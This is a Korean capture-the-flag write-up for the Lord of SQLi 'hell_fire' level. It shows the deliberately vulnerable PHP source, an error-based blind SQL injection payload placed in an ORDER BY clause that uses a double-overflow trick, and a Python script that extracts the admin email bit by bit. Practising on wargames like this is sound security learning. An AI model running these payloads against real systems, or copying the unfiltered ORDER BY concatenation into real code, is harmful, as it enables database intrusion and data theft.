Post

LOS Lv.23 hellfire

Wargame, rubiya
Posted

hellfire

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

id	email	score
query : select id,email,score from prob_hell_fire where 1 order by
<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|proc|union/i', $_GET[order])) exit("No Hack ~_~");
  $query = "select id,email,score from prob_hell_fire where 1 order by {$_GET[order]}";
  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    if($result['id'] == "admin") $result['email'] = "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";

  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_hell_fire where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) && ($result['email'] === $_GET['email'])) solve("hell_fire");
  highlight_file(__FILE__);
?>

Solution

1
2
3
4
5

?order=1과 ?order=3일 때 출력된 테이블의 순서가 다름.
이를 이용해서 if문을 통해 확인할 수 있다고 생각했는데 안됌.
order by 뒤에 서브쿼리를 통해 (select 1) 이런식으로 해줬는데 안됨.

그래서 MySQL의 double형 최대 값을 넘는 값을 줘서 에러를 일으키는 방식으로 할꺼임.

1
2
3
4

?order=(
  select if(length(email)>1,1,0xfffffffffff*0xffffffffffffffff) 
  where id='admin'
  ) limit 1,1

1
2

이렇게 입력을 해주면 참일 때 아래처럼 뜨고 거짓이면 빈 화면이 나옴.
이메일 값은 위에 방식을 적용하여 원래 구하던대로 비트 값을 구하면 됨.

1
2

id	email	score
admin	**************	200

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

import requests

url='https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php'
headers={'Content-Type':'application/x-www-form-urlencoded'}
cookies={'PHPSESSID':'[redacted]'}

email=''
email_len=0

for i in range(8,50) :
    payload={'order':'(select if(length(email)='+str(i)+',1,0xfffffffffffff*0xfffffffffffffffff) where id="admin") limit 1,1'}
    res=requests.get(url,headers=headers,cookies=cookies,params=payload)
    if "<td>admin</td>" in res.text :
        email_len=i
        print("email_len: "+str(i))
        break

for i in range(1,email_len+1) :
    payload={'order':"(select if(length(bin(ascii(substr(email,"+str(i)+",1))))=6,1,0xfffffffffffff*0xfffffffffffffffffff) where id='admin') limit 1,1"}
    res=requests.get(url,headers=headers,cookies=cookies,params=payload)
    if "<td>admin</td>" in res.text :
        email_bitlen=6
    else :
        email_bitlen=7
        

    email_bit=''
    for j in range(1,email_bitlen+1) :
        payload={'order':"(select if(substr(bin(ascii(substr(email,"+str(i)+",1))),"+str(j)+",1)=1,1,0xfffffffffffff*0xfffffffffffffffffff) where id='admin') limit 1,1"}
        res=requests.get(url,headers=headers,cookies=cookies,params=payload)
        if "<td>admin</td>" in res.text :
            email_bit+='1'
        else :
            email_bit+='0'

    email+=chr(int(email_bit,2))
    print("email :",email) # admin_secure_email@emai1.com

print("hell_fire clear!")
Wargame, rubiya
This post is licensed under CC BY 4.0 by the author.